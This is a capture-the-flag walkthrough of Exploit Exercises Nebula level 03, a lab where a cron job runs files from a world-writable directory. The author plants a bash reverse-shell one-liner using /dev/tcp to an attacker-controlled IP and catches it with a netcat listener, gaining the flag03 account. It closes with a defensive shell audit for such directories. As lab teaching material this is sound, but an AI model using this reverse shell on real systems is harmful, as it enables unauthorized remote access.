Exploit Exercises: Nebula Level 03

Check the home directory of flag03 and take note of the files there.

There is a crontab that is called every couple of minutes.

To do this level, log in as the level03 account with the password level03. Files for this level can be found in /home/flag03.

Source code

There is no source code available for this level.

Solution

Let’s jump in!

level03@nebula:/home/flag03$ ls -al
total 6
drwxr-x--- 3 flag03 level03  103 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag03 flag03   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag03 flag03  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag03 flag03   675 May 18  2011 .profile
drwxrwxrwx 2 flag03 flag03     3 Aug 18  2012 writable.d
-rwxr-xr-x 1 flag03 flag03    98 Nov 20  2011 writable.sh

Interesting! Let’s get more info about the task.

level03@nebula:/home/flag03$ cat writable.sh
#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

level03@nebula:/home/flag03$ cd ./writable.d/
level03@nebula:/home/flag03/writable.d$ ls -al
total 0
drwxrwxrwx 2 flag03 flag03    3 Aug 18  2012 .
drwxr-x--- 3 flag03 level03 103 Nov 20  2011 ..
level03@nebula:/home/flag03/writable.d$

We have been told from the beginning that there is a crontab that is called every couple of minutes. But what is a crontab?

Wikipedia: The software utility Cron is a time-based job scheduler in Unix-like computer operating systems. People who set up and maintain software environments use cron to schedule jobs (commands or shell scripts) to run periodically at fixed times, dates, or intervals. It typically automates system maintenance or administration—though its general-purpose nature makes it useful for things like downloading files from the Internet and downloading email at regular intervals.

We will assume that the crontab is executing the only script we have, “writable.sh”. Let’s look at the code again:

#!/bin/sh

for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")  # (1)
	rm -f "$i"                   # (2)
done

Simple! At line (1) the script executes each file in “/home/flag03/writable.d/” with bash, and at line (2) it removes that file. Since writable.d is world-writable (drwxrwxrwx), any script we drop there will be run by the cron job. Fine, let’s get a shell!

lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)

Now let’s prepare our script.

level03@nebula:/home/flag03$ cd writable.d/
level03@nebula:/home/flag03/writable.d$ echo "bash -i >& /dev/tcp/192.168.0.104/8080 0>&1" > shell.sh
level03@nebula:/home/flag03/writable.d$ cat shell.sh
bash -i >& /dev/tcp/192.168.0.104/8080 0>&1

Done. Now we wait about 5 minutes for the crontab to execute.

lucian@vm:~$ nc -nvlp 8080
Listening on [0.0.0.0] (family 0, port 8080)
Connection from [192.168.0.100] port 8080 [tcp/*] accepted (family 2, sport 45702)
bash: no job control in this shell
flag03@nebula:~$ id
id
uid=996(flag03) gid=996(flag03) groups=996(flag03)
flag03@nebula:~$ getflag
getflag
You have successfully executed getflag on a target account
flag03@nebula:~$
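
The root cause in this level is a scheduled job that executes every file it finds in a world-writable directory. The following audit is an added example, not part of the original post or the Nebula image; the function names and the ownership/permission policy are assumptions, and it relies only on POSIX sh and find:

```shell
#!/bin/sh
# Added example: audit a cron "drop directory" such as writable.d.
# Function names and the policy below are illustrative assumptions.

# dir_is_trusted DIR OWNER
# Succeeds only if DIR is a real directory (not a symlink) owned by OWNER
# that neither group nor others can write to. writable.d in the post is
# drwxrwxrwx, so it fails this check.
dir_is_trusted() {
    [ -d "$1" ] && [ ! -L "$1" ] || return 1
    [ -n "$(find "$1" -prune -type d -user "$2" ! -perm -020 ! -perm -002)" ]
}

# file_is_trusted FILE OWNER
# Succeeds only for a regular file (no symlink) owned by OWNER that is
# not group- or world-writable.
file_is_trusted() {
    [ -f "$1" ] && [ ! -L "$1" ] || return 1
    [ -n "$(find "$1" -prune -type f -user "$2" ! -perm -020 ! -perm -002)" ]
}

# audit_dropdir DIR OWNER
# Prints one finding per line; the return status is the number of findings
# (0 means the directory and everything in it pass the policy).
audit_dropdir() {
    findings=0
    if ! dir_is_trusted "$1" "$2"; then
        echo "UNSAFE-DIR $1: not owned by $2 or group/world-writable"
        findings=$((findings + 1))
    fi
    # Cover regular names and dotfiles; unmatched globs are skipped.
    for f in "$1"/* "$1"/.[!.]*; do
        [ -e "$f" ] || [ -L "$f" ] || continue
        if ! file_is_trusted "$f" "$2"; then
            echo "UNTRUSTED-FILE $f"
            findings=$((findings + 1))
        fi
    done
    return "$findings"
}
```

Called as `audit_dropdir /home/flag03/writable.d flag03`, this reports the directory itself as the first finding. Restricting write access to the directory is the actual fix; the per-file check is defense in depth and is still subject to a race between the check and the execution.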

See you in the next tutorial!

This post is licensed under CC BY 4.0 by the author.